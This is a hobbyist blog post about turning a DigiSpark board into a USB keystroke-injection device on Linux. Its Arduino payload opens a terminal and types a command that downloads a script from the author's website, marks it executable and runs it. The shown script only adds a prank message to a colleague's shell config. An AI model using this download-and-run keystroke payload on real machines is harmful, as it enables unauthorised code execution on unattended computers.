After attending BSides Canberra I managed to get one of the DigiSparks from Redacted who offered them up as a sort of home brew USB rubber ducky. Kudos to Tomais for actually getting me one.

The DigiSpark for reference:

DigiSpark

Naturally I wanted to have some fun with it, and being primarily a linux user I developed the payload with that in mind. It took a fair amount of trial and error, but I ended up with a payload that was able to pull a script from this site, download it and execute. I’m quite happy with this approach as it means I am not limited by the onboard program storage and can simply write a bash script which is downloaded and executed.

The payload in question:

#include "DigiKeyboard.h"
void setup() {}
void loop() {
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("nohup wget https://skelmis.co.nz/ducky.sh -P /tmp && nohup chmod +x /tmp/ducky.sh && nohup /tmp/ducky.sh");
  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(200);
  DigiKeyboard.println("exit");

  // Blink the red LED when the code has finished executing
  while (true)
  {
    digitalWrite(0, HIGH);
    digitalWrite(1, HIGH);
    delay(300);
    digitalWrite(0, LOW);
    digitalWrite(1, LOW);
    delay(300);
  }
}

As for the script I ended up writing, it is a somewhat terminal aware script which adds a print whenever a new instance is created. At work, we have a habit of typing a message on someone’s behalf if they leave a computer un-attended and unlocked, so I figure why not do the same thing but just easier? Also, the phrase it prints honestly reminds me of the anti-piracy ads from my childhood such as “You wouldn’t steal a car”.

#!/usr/bin/env bash
FILE=~/.zshrc
if [[ -f "$FILE" ]]; then
    echo "echo \"You wouldn't hack a colleague ~ Someone, sometime, somewhere\"" >> ~/.zshrc
    echo "# Looks like you left your computer unlocked ~ Skelmis" >> ~/.zshrc
else
    echo "echo \"You wouldn't hack a colleague ~ Someone, sometime, somewhere\"" >> ~/.bashrc
    echo "# Looks like you left your computer unlocked ~ Skelmis" >> ~/.bashrc
fi

Anyway, this was an extremely fun rabbit hole for a couple of hours after my flights today were cancelled due to bomb alerts at my destination. I’m totally looking forward to being able to poke more at this device in the future as new use case ideas come to mind.